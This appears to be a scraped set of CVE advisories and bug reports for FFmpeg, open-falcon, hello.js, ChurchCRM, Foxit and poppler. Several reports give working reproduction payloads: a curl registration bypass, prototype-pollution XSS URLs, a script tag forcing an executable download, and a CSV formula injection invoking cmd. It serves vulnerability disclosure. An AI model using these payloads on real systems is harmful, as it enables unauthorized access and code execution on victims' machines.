Integer overflow vulnerability in av_timecode_make_string in libavutil/timecode.c in FFmpeg version 4.3.2, allows local attackers to cause a denial of service (DoS) via crafted .mov file.

author

Michael Niedermayer <michael@niedermayer.cc>

Mon, 1 Mar 2021 12:44:12 +0000 (13:44 +0100)

committer

Michael Niedermayer <michael@niedermayer.cc>

Sun, 14 Mar 2021 22:29:51 +0000 (23:29 +0100)

Fixes: Integer overflow and division by 0  
Fixes: poc-202102-div.mov

Found-by: 1vanChen of NSFOCUS Security Team  
Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>

  

index b1b504edbf601d8cd59effa71b2edf97791aa0e6..2fc3295e25dedc328a2943673b7c8734570516c1 100644 (file)  

@@ \-114,8 +114,8 @@ char \*av\_timecode\_make\_string(const AVTimecode \*tc, char \*buf, int framenum)

     }

     ff = framenum % fps;

     ss = framenum / fps        % 60;

\-    mm = framenum / (fps\*60)   % 60;

\-    hh = framenum / (fps\*3600);

+    mm = framenum / (fps\*60LL) % 60;

+    hh = framenum / (fps\*3600LL);

     if (tc->flags & AV\_TIMECODE\_FLAG\_24HOURSMAX)

         hh = hh % 24;

     snprintf(buf, AV\_TIMECODE\_STR\_SIZE, "%s%02d:%02d:%02d%c%02d",

CVE-2021-28429: git.ffmpeg.org Git - ffmpeg.git/commitdiff

An issue was discovered in open-falcon dashboard version 0.2.0, allows remote attackers to gain, modify, and delete sensitive information via crafted POST request to register interface.

Dear Author,  
I’m testivy. I found that the latest version 0.2.0 of falcon dashboard has a bypass problem of the registeration.As the link below:  
http://book.open-falcon.com/en\_0\_2/quick\_install/frontend.html#dashboard-user-management  
when we try to change the value of item "signup\_disable" to "true" in the API configuration file "cfg.json" then reboot API for a purpose to restrict the register function meaning that this is only for "sign in" not for "sign up".  
I found in the code that I can bypass it under the "/auth/register " interface. In this condition, I can bypass the registeration restriction and do as below:  
Call the user added interface and add a new user (POST https://127.0.0.1:8081/auth/register name=test&cnname=test&email=test@test.cn&password=xxx&repeat_password=xxx), then use the newly added account to log in to the dashboard for viewing ,modifing, and adding .

**Vulnerability details**  
This problem mainly occurs in _dashboard/rrd/view/auth/auth.py_

    @app.route("/auth/register", methods=["GET", "POST"])
    def auth_register():
        if request.method == "GET":
            if g.user:
                return redirect("/auth/login")
            return render_template("auth/register.html", **locals())
    
        if request.method == "POST":
            ret = {"msg":""}
    
            name = request.form.get("name", "").strip()
            cnname = request.form.get("cnname", "").strip()
            email = request.form.get("email", "").strip()
            password = request.form.get("password", "")
            repeat_password = request.form.get("repeat_password", "")
    
    

As we can see, the above if branches:  
in **if request.method == "GET"** will judge the g.user otherwise redirect to "/auth/login" ,But when the request.method == "POST",the system will get request param to add a account by "name,cnname,email,password and repeat\_password" to the backend. Under the certain circumstances,we can directly call the "auth/register" interface with post method to add a new user.

**Loopholes Reproduce**  
1.curl -XPOST 'http://127.0.0.1:8081/auth/register'  --data 'name=test&cnname=test&email=test%40test.cn&password=test1234&repeat_password=test1234'  
As we can see, register restriction has been bypassed and a new account has been added to the dashboard management without logging in.  
The response is as below:  
{"msg":""}   
2.View the console  

Visit the index page http://127.0.0.1:8081/, then log in to the new account, and you will can do anything.

Best Regards

CVE-2021-27523: Report a security vulnerability in falcon dashboard to bypass register restriction through the function in register has been closed · Issue #153 · open-falcon/dashboard

Prototype pollution vulnerability in MrSwitch hello.js version 1.18.6, allows remote attackers to execute arbitrary code via hello.utils.extend function.

**Abstract**

The function hello.utils.extend, defined in file hello.js, introduces a Prototype Pollution vulnerability, which could result in Cross-Site Scripting.

hello.utils \= {

// Extend the first object with the properties and methods of the second

extend: function(r /\*, a\[, b\[, ...\]\] \*/) {

// Get the arguments as an array but ommit the initial item

Array.prototype.slice.call(arguments, 1).forEach(function(a) {

if (Array.isArray(r) && Array.isArray(a)) {

Array.prototype.push.apply(r, a);

}

else if (r && (r instanceof Object || typeof r \=== 'object') && a && (a instanceof Object || typeof a \=== 'object') && r !== a) {

for (var x in a) {

r\[x\] \= hello.utils.extend(r\[x\], a\[x\]);

}

}

else {

if (Array.isArray(a)) {

// Clone it

a \= a.slice(0);

}

r \= a;

}

});

return r;

}

};

The code on Line 29 has a typical pattern of Prototype Pollution.

    r[x] = hello.utils.extend(r[x], a[x]);
    

The vulnerable lines of code, then, are called on Line 1320, which could allow attackers to pollute the object in JavaScript.  

p \= \_this.merge(\_this.param(location.search || ''), \_this.param(location.hash || ''));

**Proof of Concepts**

As a result, websites, which use the hello.js, might highly likely have Cross-Site Scripting. Take the offical demo of hello.js as an example, the Prototype Pollution could be exploited as follows:

https://adodson.com/hello.js/demos/events.html#state={%22a%22:%221%22,%22\_\_proto\_\_%22:{%22callback%22:%22alert%22}}  
https://adodson.com/hello.js/demos/events.html#state={%22a%22:%221%22,%22\_\_proto\_\_%22:{%22onbeforescriptexecute%22:%22alert(location.href)%22}}  

**Suggestion**

*   Freeze the prototype— use Object.freeze (Object.prototype).
*   Require schema validation of JSON input.
*   Avoid using unsafe recursive merge functions.
*   Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.
*   As a best practice use Map instead of Object.

CVE-2021-26505: Prototype Pollution in hello.js · Issue #634 · MrSwitch/hello.js

Cross Site Scripting (XSS) vulnerability in ChurchCRM version 4.2.1, allows remote attckers to execute arbitrary code and gain sensitive information via crafted payload in Add New Deposit field in View All Deposit module.

**Name:** Stored Cross Site Scripting leading to Remote File Inclusion vulnerability  
**Description:** ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit.  
Cross Site Scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to the web application. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.  
**Impact:** The vulnerability allows an attacker to send malicious JavaScript code which could result in hijacking of the user's cookie/session tokens , redirecting the user to a malicious webpage, downloading malicious files hosted on attackers server and performing many other unintended browser actions.  
**Version Affected:** 4.2.1 and below  
**Payload Used:**  
<script>var link = document.createElement('a'); link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe'; link.download = ''; document.body.appendChild(link); link.click(); </script>  
**Vulnerable URL:** /master/FindDepositSlip.php  
**Vulnerable Parameters:** Deposit Comment  
**Steps to Reproduce:**

1.  Login to the application, go to 'View all Deposits' module.
2.  Add the payload in the 'Deposit Comment' field and click "Add New Deposit".
3.  Payload is executed and a .exe file is downloaded.

**Reference :**  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17205  
**POC :**  
  
  
**Mitigation:**  
Proper input validation and encoding should be employed to prevent the execution of any hazardous scripts.  
**Note:** There are multiple locations apart from Deposit module where the input is not sanitized properly

CVE-2020-28849: Cross Site Scripting Vulnerability leading to Remote File Inclusion · Issue #5477 · ChurchCRM/CRM

Buffer Overflow vulnerability in cFilenameInit parameter in browseForDoc function in Foxit Software Foxit PDF Reader version 10.1.0.37527, allows local attackers to cause a denial of service (DoS) via crafted .pdf file.

This website uses cookies to provide you with the best possible experience and to optimize the website to best fit the needs of our visitors. By using this website, you automatically agree to the use of cookies and your IP address. For detailed information on the use of cookies on this website, please see our Privacy Policy .

OK

CVE-2020-35990: PDF Software & Tools Tailored to Your Business | Foxit

CSV Injection vulnerability in ChurchCRM version 4.2.0, allows remote attackers to execute arbitrary code via crafted CSV file.

**Vulnerability Name:** CSV Injection/ Formula Injection  
**Severity:** High  
**Description:** CSV Injection (aka Excel Macro Injection or Formula Injection) exists in List Event Types feature in ChurchCRM v4.2.0 via Name field that is mistreated while exporting to a CSV file.  
**Impact:** Arbitrary formulas can be injected into CSV files which can lead to remote code execution at the client or data leakage via maliciously injected hyper-links.  
**Version Affected:** 4.2.0  
**Payload Used:** =10+20+cmd|' /C calc'!A0  
**Vulnerable URL:** master/EventNames.php  
**Vulnerable Parameters:** Name  
**Steps to Reproduce:**

1.  Login to the application, goto 'Events' module and then "List Event Types"
2.  Edit any event and inject the payload =10+20+cmd|' /C calc'!A0 in the 'Name' field
3.  Now goto 'List Event types' module and click CSV to download the CSV file
4.  Open the CSV file, allow all popups and our payload is executed (calculator is opened).  
      
    

**Note:** Incase the payload does not execute, then enable 'External Content' and 'Macro' settings in Excel. Goto Excel > File > Options > Trust Center > Trust Center Settings > Macro/External Content.  
**References:**  
https://nvd.nist.gov/vuln/detail/CVE-2019-12134  
http://cwe.mitre.org/data/definitions/1236.html

Just to confirm, this is not an issue with our CSV import but if a row had bad data the exported CVS has an issue. We use https://datatables.net/ if you have a chance, maybe you can help see if they have fixed that.

@DawoudIO I think the problem lies in the export feature. It would be nice to have an option in download csv to escape strings that begin with "+","-","@", or "=" by prepending "\\t".  
For any cell that begins with one of the formula triggering characters =, -, +, or @, you should directly prefix it with a tab character.

I'm not seeing how this is a particularly useful bug report. Anyone can create a CSV file with any arbitrary text in it using **any text editor** or text generation tool. How using ChurchCRM to generate a CSV with questionable content is a "bug" leaves me perplexed. For example, this logic implies the bash echo command has this same _"bug"_ too:

echo -e "Header 1, Header 2, Header 3\\n1,=10+20+cmd|' /C calc'!A0,Foo bar\\n2,Hello world,Text text" \> test.csv

If there was a method to use unauthenticated access to ChurchCRM that allowed insertion of arbitrary data values AND generate a CSV AND somehow send that somewhere then _maybe_ I'd consider this a flaw in ChurchCRM. Maybe I'm missing something?

I understand that this vulnerability would be much impactful if any unauthenticated user would be able to inject the payload resulting into code execution on the internal user's system. However this could also be impactful, if any internal user of the application enters the payload which results into impacting all the other user of the application. Here the payload is entered on ChurchCRM application leaving the application at fault to generate a file which can execute malicious commands on the user's system. A user may embed Dynamic Data Exchange (DDE) formulas to perform code execution, download a backdoor, open a malicious website etc.  
The legitimate user may download the file because of following reasons:

1.  The user trusts the site that the content is coming from.
2.  The user assumes that it is only a csv file and that it won't contain functions or macro's and won't care about any warnings from Excel about potential malicious functionality in the file.

https://owasp.org/www-community/attacks/CSV\_Injection#:~:text=CSV%20Injection%2C%20also%20known%20as,the%20software%20as%20a%20formula.  
https://payatu.com/csv-injection-basic-to-exploit

Feel free to create a PR.

CVE-2020-28848: CSV Injection Vulnerability · Issue #5465 · ChurchCRM/CRM

SQL Injection vulnerability in oretnom23 School Faculty Scheduling System version 1.0, allows remote attacker to execute arbitrary code, escalate privilieges, and gain sensitive information via crafted payload to id parameter in manage_user.php.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2020-36034: GitHub - TCSWT/School-Faculty-Scheduling-System

An issue was discovered in freedesktop poppler version 20.12.1, allows remote attackers to cause a denial of service (DoS) via crafted .pdf file to FoFiType1C::cvtGlyph function.

    ==107470==ERROR: AddressSanitizer: stack-overflow on address 0x7ffc5f160fd8 (pc 0x0000004ded5c bp 0x7ffc5f161850 sp 0x7ffc5f160fe0 T0)
        #0 0x4ded5b in __asan_memcpy (/src/poppler_test/build/utils/pdftops+0x4ded5b)
        #1 0x817158 in FoFiType1C::getOp(int, bool, bool*) /src/poppler_test/fofi/FoFiType1C.cc:2620:21
        #2 0x8077bd in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc:1141:15
        #3 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #4 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #5 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #6 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #7 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #8 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #9 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #10 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #11 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #12 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #13 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #14 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #15 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #16 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #17 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #18 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #19 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #20 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #21 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #22 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #23 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #24 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #25 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #26 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #27 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #28 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #29 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #30 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #31 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #32 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #33 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #34 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #35 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #36 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #37 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #38 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #39 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #40 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #41 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #42 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
    ...
    ...

This cause segmentation fault without ASAN.

CVE-2020-36023: Stack-Overflow in `FoFiType1C::cvtGlyph` results in Segmentation Fault (#1013) · Issues · poppler / poppler · GitLab

An issue was discovered in freedesktop poppler version 20.12.1, allows remote attackers to cause a denial of service (DoS) via crafted .pdf file to FoFiType1C::convertToType1 function.

      299      } else {
        300          (*outputFunc)(outputStream, "256 array\n", 10);
        301          (*outputFunc)(outputStream, "0 1 255 {1 index exch /.notdef put} for\n", 40);
        302          enc = newEncoding ? newEncoding : (const char **)encoding;
        303          for (i = 0; i < 256; ++i) {
     →  304              if (enc[i]) { // enc == 0
        305                  buf = GooString::format("dup {0:d} /{1:s} put\n", i, enc[i]);
        306                  (*outputFunc)(outputStream, buf->c_str(), buf->getLength());
        307                  delete buf;
        308              }
        309          }
    

enc == 0 in line 304.

       0x7c6e5d <FoFiType1C::convertToType1(char+0> shr    rax, 0x3
         0x7c6e61 <FoFiType1C::convertToType1(char+0> cmp    BYTE PTR [rax+0x7fff8000], 0x0
         0x7c6e68 <FoFiType1C::convertToType1(char+0> jne    0x7c9bfe <FoFiType1C::convertToType1(char const*,  char const**,  bool,  void (*)(void*,  char const*,  int),  void*)+17710>
     →   0x7c6e6e <FoFiType1C::convertToType1(char+0> mov    rdx, QWORD PTR [r15]
         0x7c6e71 <FoFiType1C::convertToType1(char+0> test   rdx, rdx
         0x7c6e74 <FoFiType1C::convertToType1(char+0> je     0x7c6df8 <FoFiType1C::convertToType1(char const*,  char const**,  bool,  void (*)(void*,  char const*,  int),  void*)+5928>
         0x7c6e76 <FoFiType1C::convertToType1(char+0> mov    rax, QWORD PTR [rip+0x926943]        # 0x10ed7c0 <__afl_area_ptr>
         0x7c6e7d <FoFiType1C::convertToType1(char+0> add    BYTE PTR [rax+0x4f23], 0x1
         0x7c6e84 <FoFiType1C::convertToType1(char+0> mov    DWORD PTR fs:[r13+0x0], 0x245f
    
    
    gef➤  print $r15
    $7 = 0x0

    [#0] 0x7c6e6e → FoFiType1C::convertToType1(this=<optimized out>, psName=0x603000019360 "ERGTBC+#3ceoSansIntel", newEncoding=<optimized out>, ascii=<optimized out>, outputFunc=<optimized out>, outputStream=<optimized out>)
    [#1] 0x6346ca → PSOutputDev::setupEmbeddedType1CFont(this=0x619000000f80, font=<optimized out>, id=<optimized out>, psName=<optimized out>)
    [#2] 0x629553 → PSOutputDev::setupFont(this=0x619000000f80, font=<optimized out>, parentResDict=<optimized out>)
    [#3] 0x62630c → PSOutputDev::setupFonts(this=<optimized out>, resDict=0x6070000020f0)
    [#4] 0x622f01 → PSOutputDev::setupResources(this=0x619000000f80, resDict=0x6070000020f0)
    [#5] 0x61da18 → PSOutputDev::writeDocSetup(this=0x619000000f80, catalog=<optimized out>, pageList=<optimized out>, duplexA=<optimized out>)
    [#6] 0x6195db → PSOutputDev::postInit(this=0x619000000f80)
    [#7] 0x6406e9 → PSOutputDev::checkPageSlice(this=<optimized out>, page=<optimized out>, rotateA=<optimized out>, useMediaBox=<optimized out>, crop=0x1, sliceX=<optimized out>, sliceY=<optimized out>, sliceW=<optimized out>, sliceH=<optimized out>, printing=<optimized out>, abortCheckCbk=<optimized out>, abortCheckCbkData=<optimized out>, annotDisplayDecideCbk=<optimized out>, annotDisplayDecideCbkData=<optimized out>)
    [#8] 0xa31aad → Page::displaySlice(this=<optimized out>, out=0x619000000f80, hDPI=<optimized out>, vDPI=<optimized out>, rotate=<optimized out>, useMediaBox=<optimized out>, crop=<optimized out>, sliceX=<optimized out>, sliceY=<optimized out>, sliceW=<optimized out>, sliceH=<optimized out>, printing=<optimized out>, abortCheckCbk=<optimized out>, abortCheckCbkData=<optimized out>, annotDisplayDecideCbk=<optimized out>, annotDisplayDecideCbkData=<optimized out>, copyXRef=<optimized out>)
    [#9] 0xa31944 → Page::display(this=0x61a0000006a0, out=0x14, hDPI=1.5817496953307363e-153, vDPI=9.041152192150418e+271, rotate=0x0, useMediaBox=0x0, crop=0x0, printing=<optimized out>, abortCheckCbk=0x0, abortCheckCbkData=0x0, annotDisplayDecideCbk=0x0, annotDisplayDecideCbkData=0x0, copyXRef=<optimized out>)

CVE-2020-36024: NULL-Pointer Deference in `FoFiType1C::convertToType1` (#1016) · Issues · poppler / poppler · GitLab

eprosima Fast DDS is a C++ implementation of the Data Distribution Service standard of the Object Management Group. Prior to versions 2.11.0, 2.10.2, 2.9.2, and 2.6.5, a data submessage sent to PDP port raises unhandled `BadParamException` in fastcdr, which in turn crashes fastdds. Versions 2.11.0, 2.10.2, 2.9.2, and 2.6.5 contain a patch for this issue.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

Source

CVE